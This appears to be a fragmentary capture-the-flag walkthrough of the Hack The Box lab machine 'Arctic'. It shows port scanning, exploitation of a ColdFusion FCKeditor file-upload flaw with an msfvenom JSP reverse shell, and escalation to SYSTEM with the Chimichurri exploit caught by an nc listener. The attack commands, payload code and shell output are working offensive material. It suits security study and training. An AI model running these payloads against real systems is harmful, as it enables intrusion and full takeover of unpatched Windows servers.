PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 8500/tcp open fmtp? 49154/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
# Generate a payload that connects back and spawns a command shell print("\nGenerating a payload...") os.system(f'msfvenom -p java/jsp_shell_reverse_tcp LHOST={lhost} LPORT={lport} -o {filename}.jsp')
# Create a request request = urllib.request.Request(f'http://{rhost}:{rport}/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/{filename}.jsp%00', data=data)
Host Name: ARCTIC OS Name: Microsoft Windows Server 2008 R2 Standard OS Version: 6.1.7600 N/A Build 7600 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 55041-507-9857321-84451 Original Install Date: 22/3/2017, 11:09:45 �� System Boot Time: 9/3/2024, 5:52:35 �� System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: x64-based PC Processor(s): 1 Processor(s) Installed. [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: el;Greek Input Locale: en-us;English (United States) Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul Total Physical Memory: 6.143 MB Available Physical Memory: 5.042 MB Virtual Memory: Max Size: 12.285 MB Virtual Memory: Available: 11.180 MB Virtual Memory: In Use: 1.105 MB Page File Location(s): C:\pagefile.sys Domain: HTB Logon Server: N/A Hotfix(s): N/A Network Card(s): 1 NIC(s) Installed. [01]: Intel(R) PRO/1000 MT Network Connection Connection Name: Local Area Connection DHCP Enabled: No IP address(es) [01]: 10.10.10.11
Privilege Name Description State ============================= ========================================= ======== SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
┌──(kali㉿offsec)-[~/Desktop/tools/Windows-Exploit-Suggester] └─$ python2 windows-exploit-suggester.py --update [*] initiating winsploit version 3.3... [+] writing to file 2024-03-08-mssb.xls [*] done
┌──(kali㉿offsec)-[~/Desktop/tools/Windows-Exploit-Suggester] └─$ python2 windows-exploit-suggester.py --database 2024-03-08-mssb.xls --systeminfo sysinfo-htb-Arctic [*] initiating winsploit version 3.3... [*] database file detected as xls or xlsx based on extension [-] please install and upgrade the python-xlrd library
C:\Users\tolis\Downloads>dir \\10.10.14.2\share dir \\10.10.14.2\share Volume in drive \\10.10.14.2\share has no label. Volume Serial Number is ABCD-EFAA
C:\Users\tolis\Downloads>Chimichurri.exe 10.10.14.2443 Chimichurri.exe 10.10.14.2443 /Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Changing registry values...<BR>/Chimichurri/-->Got SYSTEM token...<BR>/Chimichurri/-->Running reverse shell...<BR>/Chimichurri/-->Restoring default registry values...<BR> C:\Users\tolis\Downloads>
┌──(kali㉿offsec)-[~/Desktop] └─$ nc -lvnp 443 listening on [any] 443 ... connect to [10.10.14.2] from (UNKNOWN) [10.10.10.11] 49556 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\tolis\Downloads>whoami whoami nt authority\system
C:\Users\tolis\Downloads>type C:/Users/Administrator/Desktop/root.txt type C:/Users/Administrator/Desktop/root.txt The syntax of the command is incorrect.
C:\Users\tolis\Downloads>cd C:/Users/Administrator/Desktop/ cd C:/Users/Administrator/Desktop/
C:\Users\Administrator\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is 5C03-76A8